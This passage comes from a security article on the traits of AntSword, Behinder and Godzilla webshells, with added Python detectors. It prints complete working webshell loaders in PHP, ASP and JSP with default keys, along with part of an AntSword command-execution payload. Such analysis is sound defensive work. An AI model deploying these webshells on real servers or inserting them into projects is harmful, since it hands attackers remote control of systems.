3B%7Delse%7B%24d%3Darray_map
('trim'%2Carray_map('strtolower'%2C%24d))%3B%7Dreturn(function_exists(%24f)%26%26is_callable(%24f)%26%26!in_array(%24f%2C%24d))%3B%7D%3Bfunction%20runshellshock(%24d%2C%20%24c)%20%7Bif%20(substr(%24d%2C%200%2C%201)%20%3D%3D%20%22%2F%22%20%26%26%20fe('putenv')%20%26%26%20(fe('error_log')%20%7C%7C%20fe('mail')))%20%7Bif%20(strstr(readlink(%22%2Fbin%2Fsh%22)%2C%20%22bash%22)%20!%3D%20FALSE)%20%7B%24tmp%20%3D%20tempnam(sys_get_temp_dir()%2C%20'as')%3Bputenv(%22PHP_LOL%3D()%20%7B%20x%3B%20%7D%3B%20%24c%20%3E%24tmp%202%3E%261%22)%3Bif%20(fe('error_log'))%20%7Berror_log(%22a%22%2C%201)%3B%7D%20else%20%7Bmail(%22a%40127.0.0.1%22%2C%20%22%22%2C%20%22%22%2C%20%22-bv%22)%3B%7D%7D%20else%20%7Breturn%20False%3B%7D%24output%20%3D%20%40file_get_contents(%24tmp)%3B%40unlink(%24tmp)%3Bif%20(%24output%20!%3D%20%22%22)%20%7Bprint(%24output)%3Breturn%20True%3B%7D%7Dreturn%20False%3B%7D%3Bfunction%20runcmd(%24c)%7B%24ret%3D0%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(fe('system'))%7B%40system(%24c%2C%24ret)%3B%7Delseif(fe('passthru'))%7B%40passthru(%24c%2C%24ret)%3B%7Delseif(fe('shell_exec'))%7Bprint(%40shell_exec(%24c))%3B%7Delseif(fe('exec'))%7B%40exec(%24c%2C%24o%2C%24ret)%3Bprint(join(%22%0A%22%2C%24o))%3B%7Delseif(fe('popen'))%7B%24fp%3D%40popen(%24c%2C'r')%3Bwhile(!%40feof(%24fp))%7Bprint(%40fgets(%24fp%2C2048))%3B%7D%40pclose(%24fp)%3B%7Delseif(fe('proc_open'))%7B%24p%20%3D%20%40proc_open(%24c%2C%20array(1%20%3D%3E%20array('pipe'%2C%20'w')%2C%202%20%3D%3E%20array('pipe'%2C%20'w'))%2C%20%24io)%3Bwhile(!%40feof(%24io%5B1%5D))%7Bprint(%40fgets(%24io%5B1%5D%2C2048))%3B%7Dwhile(!%40feof(%24io%5B2%5D))%7Bprint(%40fgets(%24io%5B2%5D%2C2048))%3B%7D%40fclose(%24io%5B1%5D)%3B%40fclose(%24io%5B2%5D)%3B%40proc_close(%24p)%3B%7Delseif(fe('antsystem'))%7B%40antsystem(%24c)%3B%7Delseif(runshellshock(%24d%2C%20%24c))%20%7Breturn%20%24ret%3B%7Delseif(substr(%24d%2C0%2C1)!%3D%22%2F%22%20%26%26%20%40class_exists(%22COM%22))%7B%24w%3Dnew%20COM('WScript.shell')%3B%24e%3D%24w-%3Eexec
(%24c)%3B%24so%3D%24e-%3EStdOut()%3B%24ret.%3D%24so-%3EReadAll()%3B%24se%3D%24e-%3EStdErr()%3B%24ret.%3D%24se-%3EReadAll()%3Bprint(%24ret)%3B%7Delse%7B%24ret%20%3D%20127%3B%7Dreturn%20%24ret%3B%7D%3B%24ret%3D%40runcmd(%24r.%22%202%3E%261%22)%3Bprint%20(%24ret!%3D0)%3F%22ret%3D%7B%24ret%7D%22%3A%22%22%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&icab0fb61b302a=co&j6a20c13d709ac=hLY2QgL2QgIkM6L3BocHN0dWR5X3Byby9XV1ciJndob2FtaSZlY2hvIGQ1OWMwJmNkJmVjaG8gY2UwNjdmMTA2OQ%3D%3D&xd7cdb44e2a206=ryY21k

The request uses the POST method, and the parameter name is the password of the one-line trojan.

Every request body begins with

@ini_set("display_errors", "0");@set_time_limit(0)

and contains strings such as base64.




The result in the response has the format

<random number><result><random number>
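The request in the capture above carries everything needed to interpret the response: the two `echo "..."."...";` statements give the random delimiters, and each `base64_decode(substr($_POST["..."],2))` names a parameter whose value is base64 behind two junk characters. The following Python code is an added example, not from the original post or the AntSword project; it recovers these from a request and unwraps the response. The function names and the shortened lab exchange are constructed for illustration.

```python
import base64
import re
from urllib.parse import parse_qsl, urlencode

ANTSWORD_PROLOGUE = '@ini_set("display_errors", "0");@set_time_limit(0)'
# echo "39"."344";  ->  delimiter 39344
ECHO_PAIR = re.compile(r'echo\s+"(\w+)"\."(\w+)";')
# base64_decode(substr($_POST["name"],2))  ->  (name, number of junk characters)
ARG_REF = re.compile(r'base64_decode\(substr\(\$_POST\["(\w+)"\],(\d+)\)\)')


def parse_antsword(body: str):
    """Return password parameter, response delimiters and decoded arguments."""
    params = dict(parse_qsl(body, keep_blank_values=True))
    code_param = next(
        (n for n, v in params.items() if v.startswith(ANTSWORD_PROLOGUE)), None
    )
    if code_param is None:
        return None  # no parameter starts with the fixed prologue
    code = params[code_param]
    delimiters = ["".join(pair) for pair in ECHO_PAIR.findall(code)][:2]
    args = {}
    for name, skip in ARG_REF.findall(code):
        raw = params.get(name, "")[int(skip):]
        try:
            args[name] = base64.b64decode(raw, validate=True).decode("utf-8", "replace")
        except ValueError:
            args[name] = None  # value is not valid base64
    return {"password_param": code_param, "delimiters": delimiters, "args": args}


def extract_result(response: str, delimiters: list[str]):
    """Strip the random start/end delimiters from a response body."""
    if len(delimiters) != 2:
        return None
    start, end = delimiters
    if len(response) < len(start) + len(end):
        return None
    if response.startswith(start) and response.endswith(end):
        return response[len(start):len(response) - len(end)]
    return None


def sample_exchange() -> tuple[str, str]:
    """Constructed lab exchange: a shortened request in the shape of the capture."""
    def b64(text: str) -> str:
        return base64.b64encode(text.encode()).decode()

    code = (
        ANTSWORD_PROLOGUE + ";"
        "function asoutput(){$output=ob_get_contents();ob_end_clean();"
        'echo "39"."344";echo @asenc($output);echo "c0b7"."944b7";}'
        '$p=base64_decode(substr($_POST["xd7cdb44e2a206"],2));'
        '$s=base64_decode(substr($_POST["j6a20c13d709ac"],2));'
    )
    body = urlencode({
        "a": code,
        "xd7cdb44e2a206": "ry" + b64("cmd"),
        "j6a20c13d709ac": "hL" + b64("whoami"),
    })
    return body, "39344" + "lab\\user\n" + "c0b7944b7"


if __name__ == "__main__":
    request_body, response_body = sample_exchange()
    info = parse_antsword(request_body)
    print(info)
    print(repr(extract_result(response_body, info["delimiters"])))
```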


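Behinder (冰蝎)

Behinder is a website management client that uses dynamic binary encryption.

Behinder webshell static signatures

The analysis here uses Behinder 3.0 as the example.

It uses a pre-shared key of the form md5("admin")[0:16], so the webshell in every language contains a 16-character connection password; the default variable name is k.

The PHP version checks whether openssl is enabled and uses a different encryption algorithm accordingly. The code also contains character signatures such as eval or assert.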

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; // This key is the first 16 characters of the 32-character MD5 of the connection password; the default connection password is rebeyond
    $_SESSION['k']=$key;
    session_write_close();
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");
        for($i=0;$i<strlen($post);$i++) {
            $post[$i] = $post[$i]^$key[$i+1&15];
        }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>




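The ASP version performs an XOR operation inside a for loop.

<%
Response.CharSet = "UTF-8"
k="e45e329feb5d925b" 'This key is the first 16 characters of the 32-character MD5 of the connection password; the default connection password is rebeyond
Session("k")=k
size=Request.TotalBytes
content=Request.BinaryRead(size)
For i=1 To size
result=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))
Next
execute(result)
%>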




The JSP version relies on Java reflection, so it contains character signatures such as ClassLoader and getClass().getClassLoader().

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*This key is the first 16 characters of the 32-character MD5 of the connection password; the default connection password is rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>



Behinder webshell dynamic signatures

POST /shell.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-type: application/x-www-form-urlencoded
Referer: http://localhost/shell.php
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Cache-Control: no-cache
Pragma: no-cache
Host: localhost
Connection: close
Content-Length: 11224
Cookie: PHPSESSID=qmtqbaljijj6mrj7a71q9l6f81;PHPSESSID=qmtqbaljijj6mrj7a71q9l6f81

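The analysis here focuses on Behinder 3.0, which removed the dynamic key negotiation mechanism and uses a pre-shared key instead, with no plaintext exchanged at any point. The key has the form md5("admin")[0:16]. Some signatures nevertheless remain.

When a command is executed, the Content-Length of the request is fixed (it changes with the Java version).

Every request header contains

Cache-Control: no-cache
Pragma: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8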



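Godzilla (哥斯拉)

Godzilla is a webshell management tool that followed Chopper, AntSword and Behinder and has many advantages. Users can choose among different encryption methods according to their needs and generate webshells dynamically.

Godzilla webshell static signatures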

<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] 
data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}%>

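In scripts generated with the default settings, the JSP contains the strings xc and pass, Java reflection (ClassLoader, getClass().getClassLoader()), base64 encoding and decoding, and similar signatures.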
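The static signatures described for Behinder and Godzilla share one shape: a quoted 16-character hex key next to decrypt-and-load code. The following Python code is an added example, not from the original post or either tool: it finds 16-hex literals, tests whether they equal md5(password)[0:16] for a wordlist, and requires at least two loader traits in the same file before flagging it. The trait names, the wordlist and the inline fragments (characteristic lines only, taken from the scripts on this page) are assumptions for illustration.

```python
import hashlib
import re

HEX16 = re.compile(r"""["']([0-9a-f]{16})["']""")

# Loader traits per language, taken from the signatures described on this page.
TRAITS = {
    "php": {
        "raw_body": r"php://input",
        "openssl_decrypt": r"openssl_decrypt\s*\(",
        "dynamic_eval": r"\b(?:eval|assert)\s*\(",
    },
    "asp": {
        "binary_read": r"Request\.BinaryRead",
        "xor_loop": r"\bXor\b",
        "execute": r"\bexecute\s*\(",
    },
    "jsp": {
        "classloader": r"extends\s+ClassLoader",
        "define_class": r"defineClass\s*\(",
        "aes_cipher": r'Cipher\.getInstance\(\s*"AES',
        "loader_ref": r"getClass\(\)\.getClassLoader\(\)",
    },
}


def derive_key(password: str) -> str:
    """Key format stated on this page: first 16 hex characters of md5(password)."""
    return hashlib.md5(password.encode()).hexdigest()[:16]


def scan(source: str, wordlist: list[str]) -> dict:
    """Report key-like literals, matching passwords and loader traits in one file."""
    candidates = {derive_key(p): p for p in wordlist}
    literals = sorted(set(HEX16.findall(source)))
    traits = {}
    for lang, rules in TRAITS.items():
        hits = [name for name, rx in rules.items() if re.search(rx, source, re.I)]
        if hits:
            traits[lang] = hits
    strong = any(len(hits) >= 2 for hits in traits.values())
    return {
        "key_literals": literals,
        "known_passwords": {k: candidates[k] for k in literals if k in candidates},
        "traits": traits,
        # A hex literal alone is common in benign code; require loader traits too.
        "suspicious": bool(literals) and strong,
    }


# Fragments containing only the characteristic lines of the scripts shown above.
BEHINDER_PHP = (
    '$key="e45e329feb5d925b"; $post=file_get_contents("php://input"); '
    '$post=openssl_decrypt($post, "AES128", $key); eval($p."");'
)
GODZILLA_JSP = (
    'String xc="3c6e0b8a9c15224a"; String pass="pass"; '
    "class X extends ClassLoader{ return super.defineClass(cb, 0, cb.length); } "
    'javax.crypto.Cipher.getInstance("AES"); new X(this.getClass().getClassLoader())'
)
# Constructed benign line that happens to contain a 16-hex literal.
BENIGN_PHP = '$cache_id = "00112233aabbccdd"; echo htmlspecialchars($name);'

if __name__ == "__main__":
    for text in (BEHINDER_PHP, GODZILLA_JSP, BENIGN_PHP):
        print(scan(text, ["admin", "rebeyond"]))
```

A key that matches a wordlist entry also tells the responder which connection password the operator used.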




The PHP and ASP versions are the most ordinary one-line trojans, so they are not covered again here.

Godzilla webshell dynamic signatures

POST /go.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Host: localhost
Connection: close
Content-type: application/x-www-form-urlencoded
Content-Length: 31979


Every request contains:

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8




Every response contains:

Cache-Control: no-store, no-cache, must-revalidate
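
The two header values above only become useful for detection when correlated with the request body. The following check is an added example, not code from the original article: it flags a (client, path) only when every captured pair carries both headers and a POST form value URL-decodes to a payload beginning with the `eval(base64_decode(strrev(urldecode(` wrapper. The function names, the three-pair threshold and the sample traffic are assumptions; the traffic is constructed, with `pass` and `key` as the parameter names from the request captured in this section.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Header values this page lists for every request and every response.
REQ_ACCEPT = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
RESP_CACHE = "no-store, no-cache, must-revalidate"
# Decoder-chain wrapper at the start of a URL-decoded form value.
WRAPPER = re.compile(
    r"^\s*eval\s*\(\s*base64_decode\s*\(\s*strrev\s*\(\s*urldecode\s*\(", re.I)

def parse_message(raw):
    """Split a raw HTTP message into (start line, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def score_pair(raw_request, raw_response):
    """Return the set of indicators matched by one request/response pair."""
    start, req_h, body = parse_message(raw_request)
    _, resp_h, _ = parse_message(raw_response)
    hits = set()
    if req_h.get("accept") == REQ_ACCEPT:
        hits.add("accept")
    if resp_h.get("cache-control", "").lower() == RESP_CACHE:
        hits.add("cache-control")
    # parse_qsl URL-decodes each value, so %28 is "(" by the time we match.
    if start.upper().startswith("POST ") and any(
            WRAPPER.match(v) for _, v in parse_qsl(body, keep_blank_values=True)):
        hits.add("decoder-wrapper")
    return hits

def suspicious_endpoints(flows, min_pairs=3):
    """flows: (client_ip, raw_request, raw_response) tuples. Flag a (client, path)
    when every pair has both headers and some POST carries the wrapper."""
    groups = defaultdict(list)
    for client, req, resp in flows:
        path = req.split(" ", 2)[1].split("?", 1)[0]
        groups[(client, path)].append(score_pair(req, resp))
    flagged = []
    for key, hits in groups.items():
        always, ever = set.intersection(*hits), set.union(*hits)
        if (len(hits) >= min_pairs and {"accept", "cache-control"} <= always
                and "decoder-wrapper" in ever):
            flagged.append(key)
    return sorted(flagged)

# Constructed sample traffic (documentation IPs, inert placeholder payloads).
def _pair(path, accept, body, cache):
    req = (f"POST {path} HTTP/1.1\r\nHost: app.example\r\nAccept: {accept}\r\n"
           f"Content-Type: application/x-www-form-urlencoded\r\n\r\n{body}")
    return req, f"HTTP/1.1 200 OK\r\nCache-Control: {cache}\r\n\r\nok"
SHELL_BODY = ("pass=eval%28base64_decode%28strrev%28urldecode%28%27PLACEHOLDER"
              "%27%29%29%29%29%3B&key=PLACEHOLDER")
SAMPLE_FLOWS = (
    [("203.0.113.7", *_pair("/uploads/a.php", REQ_ACCEPT, SHELL_BODY, RESP_CACHE))] * 3
    # Benign PHP login: same two headers, ordinary form body -> not flagged.
    + [("198.51.100.9", *_pair("/login.php", REQ_ACCEPT, "user=alice&pw=x", RESP_CACHE))] * 3
)
```

Both header values also appear in ordinary browser requests and PHP session responses, which is why the constructed `/login.php` flow matches them yet is not flagged; the headers are supporting evidence, the decoder wrapper is the discriminator.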



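Originally published on the WeChat official account Tide安全团队 (Tide Security Team): 免杀基础-常见Webshell特征分析 (AV Evasion Basics: Analysis of Common Webshell Characteristics)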
